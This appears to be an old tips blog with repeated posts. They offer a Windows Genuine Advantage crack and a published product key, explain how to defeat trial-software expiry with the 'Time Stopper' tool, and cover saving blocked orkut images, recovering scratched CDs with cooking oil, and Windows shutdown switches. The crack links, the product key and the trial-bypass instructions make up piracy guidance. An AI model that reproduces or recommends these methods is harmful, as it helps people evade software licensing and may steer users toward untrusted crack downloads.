Download Windows Genuine Advantage v1.7.17.0 Crack
Download Windows Genuine Advantage v1.7.17.0 Crack MIRROR
Hope You like them
Once you have made your windows Genuine it have a lot of advantages...Like you can install :
Internet Explorer 7
Windows Media Player 11
Windows Defender
And Much more...
Method 1 :
Download This File or This
after that each time you want to update or install a new upgrade you just have to run this file to make your windows genuine...
If you restart your computer you have ti run this registry file again...
Method 2 :
Download jellybean keyfinder from here
rapidshare.com/files/22706111/keyfinder.zip
Now open keyfinder.exe
Click on options and click "change windows key"
Now enter this key and you're done.
*****************************
V2C47-MK7JD-3R89F-D2KXW-VPK3J
*****************************
Method 3 :
Download these Cracks :
Download Windows Genuine Advantage v1.7.17.0 Crack
Download Windows Genuine Advantage v1.7.17.0 Crack MIRROR
Hope You like them
How to recover MOST of scratched CD data discs
How to recover MOST of scratched CD data discs
I learn an old thecnique to how to recover damaged or scratched disks
with some lost of data. In this case i have one borrowed game - MAX PAYNE 2
with a chunck of 4 mb lost with a scratch in CD1 Install. Here we cover some
special thecniques of how to create a full working CD from the scratched one.
First some tools will be needed:
1. Alcohol 120%
2. UltraISO
3. Windows XP/2000 (not tested on 95/98/me)
3. Small piece of cotton
4. Dry cleaner paper
5. Finally, oil for cooking.
First step - preparing the CD
Get the cotton and drop some water, start cleaning vertically the surface of CD.
Do it 3 times and dry the water with a piece of dry cleaner paper. With a new piece
of cotton, drop some oil for cooking and start to wet the surface like you are
washing the CD with the oil. Dry carefully now. Some particles of oil will stay on the
microsurface of the scrath. It's okay. Seems the oil helps the laser of the CD/DVD driver
to read the surface again. Sure this will work with small unreadable scratchs - some hard
scratchs loose parts of the surface of the CD where we have data and it's lost forever.
But if it is loosed try anyway. Whith this tip 80% of the small scratched CD's coud be
recovered.
Second Step - testing the CD
With Alcohol 120% make an ISO - image making wizard - and lets see if the app can
read the loosed surface. In my case Alcohol 120% had recovered 60% of the data.
This is not enough. Have tryed other appz, they do not recover all the data. But the
CD/DVD driver laser CAN recover all data in this case. the data is still there, what we do?
third step - making the new CD
With the main copy system of windows explorer you can do it. Just create one folder
with the same name of the CD label for future burn reference, and copy the CD content
to the folder. When the CD copy process find the scratch, in majority of the cases, it's
slow down the reading and will recover ALL loosed data.If not, it just tell you there's
an unreadable sector. In this case your CD is lost. But it's not my case, finally
windows explorer got all the data from the scratch and made a copy in the folder.
with the ultraISO, wrote the original CD label, drop the content of the folder and
save as Iso. You can Test the new CD just mounting the iso in the Alcohol 120%. In my
case i did ISO of the two discs from MAX PAYNE 2 and tested installing from the mounted
ISO. Works like a charm. I got the 4 mb lost again. So, I have burned the CD and now i
have a working copy from the scratched one.
Sounds too bizzarre, but works. Course you can jump the cleaning process and try to copy
the content with Windows explorer. But in my case did not work without oil...
I learn an old thecnique to how to recover damaged or scratched disks
with some lost of data. In this case i have one borrowed game - MAX PAYNE 2
with a chunck of 4 mb lost with a scratch in CD1 Install. Here we cover some
special thecniques of how to create a full working CD from the scratched one.
First some tools will be needed:
1. Alcohol 120%
2. UltraISO
3. Windows XP/2000 (not tested on 95/98/me)
3. Small piece of cotton
4. Dry cleaner paper
5. Finally, oil for cooking.
First step - preparing the CD
Get the cotton and drop some water, start cleaning vertically the surface of CD.
Do it 3 times and dry the water with a piece of dry cleaner paper. With a new piece
of cotton, drop some oil for cooking and start to wet the surface like you are
washing the CD with the oil. Dry carefully now. Some particles of oil will stay on the
microsurface of the scrath. It's okay. Seems the oil helps the laser of the CD/DVD driver
to read the surface again. Sure this will work with small unreadable scratchs - some hard
scratchs loose parts of the surface of the CD where we have data and it's lost forever.
But if it is loosed try anyway. Whith this tip 80% of the small scratched CD's coud be
recovered.
Second Step - testing the CD
With Alcohol 120% make an ISO - image making wizard - and lets see if the app can
read the loosed surface. In my case Alcohol 120% had recovered 60% of the data.
This is not enough. Have tryed other appz, they do not recover all the data. But the
CD/DVD driver laser CAN recover all data in this case. the data is still there, what we do?
third step - making the new CD
With the main copy system of windows explorer you can do it. Just create one folder
with the same name of the CD label for future burn reference, and copy the CD content
to the folder. When the CD copy process find the scratch, in majority of the cases, it's
slow down the reading and will recover ALL loosed data.If not, it just tell you there's
an unreadable sector. In this case your CD is lost. But it's not my case, finally
windows explorer got all the data from the scratch and made a copy in the folder.
with the ultraISO, wrote the original CD label, drop the content of the folder and
save as Iso. You can Test the new CD just mounting the iso in the Alcohol 120%. In my
case i did ISO of the two discs from MAX PAYNE 2 and tested installing from the mounted
ISO. Works like a charm. I got the 4 mb lost again. So, I have burned the CD and now i
have a working copy from the scratched one.
Sounds too bizzarre, but works. Course you can jump the cleaning process and try to copy
the content with Windows explorer. But in my case did not work without oil...
save images from orkut albums
Since a few days right click on pictures in orkut album is disabled, so we cant not save the images from orkut albums using the save image option, also saving the entire page wont help you. Here are two simple ways to save images in orkut albums.
Using print screen (Screen Capture)
* open the pic which you want to save
* Press f11, this will hide the tool bars and gives extra room for the image.
* now press the “print screen” key on your keyboard
* Open paint or any other similar program
To open paint, press (win+r) and type “mspaint” or click on start >all programs>accessories>paint
* Now press ctr+v and save the image.
Dragging the image :
Drag the image and drop it on address bar.It will be opened in a new page where right click is enabled
Using print screen (Screen Capture)
* open the pic which you want to save
* Press f11, this will hide the tool bars and gives extra room for the image.
* now press the “print screen” key on your keyboard
* Open paint or any other similar program
To open paint, press (win+r) and type “mspaint” or click on start >all programs>accessories>paint
* Now press ctr+v and save the image.
Dragging the image :
Drag the image and drop it on address bar.It will be opened in a new page where right click is enabled
TRIAL SOFTWARE 4 FOREVER
Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all
How to use Trial Version software forever without Expiration
Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.
Time Stopper : use Trial Version software forever without Expiration
Time Stopper : use Trial Version software forever without Expiration
Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.
How it Works
* Open Time Stopper
* Browse and select .exe of required trial software
* Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
* Choose any time
* Click open software on your selected date
If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.
Size: 844 KB----
I have uploaded it.You can download it from my download lists
How to use Trial Version software forever without Expiration
Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.
Time Stopper : use Trial Version software forever without Expiration
Time Stopper : use Trial Version software forever without Expiration
Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.
How it Works
* Open Time Stopper
* Browse and select .exe of required trial software
* Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
* Choose any time
* Click open software on your selected date
If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.
Size: 844 KB----
I have uploaded it.You can download it from my download lists
Thursday, March 11, 2010
Shutdown Command Via Command Prompt
The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.
To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
You have to use at least one switch for the shutdown command to work.
The Switches :-
The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.
-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)
Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.
Examples :-
shutdown –m \\computername –r –f
This command will restart the computer named computername and force any programs that might still be running to stop.
shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.
shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.
Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.
In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.
Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
Make sure each shutdown command is on its own line.
An example of what should be typed in notepad is given below-
shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 -s
Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.
Pick the location to save the batch file in and save it.
When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.
You can use any combination of shutdown commands in a batch file.
To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
You have to use at least one switch for the shutdown command to work.
The Switches :-
The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.
-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)
Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.
Examples :-
shutdown –m \\computername –r –f
This command will restart the computer named computername and force any programs that might still be running to stop.
shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.
shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.
Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.
In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.
Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
Make sure each shutdown command is on its own line.
An example of what should be typed in notepad is given below-
shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 -s
Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.
Pick the location to save the batch file in and save it.
When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.
You can use any combination of shutdown commands in a batch file.
Subscribe to:
Posts (Atom)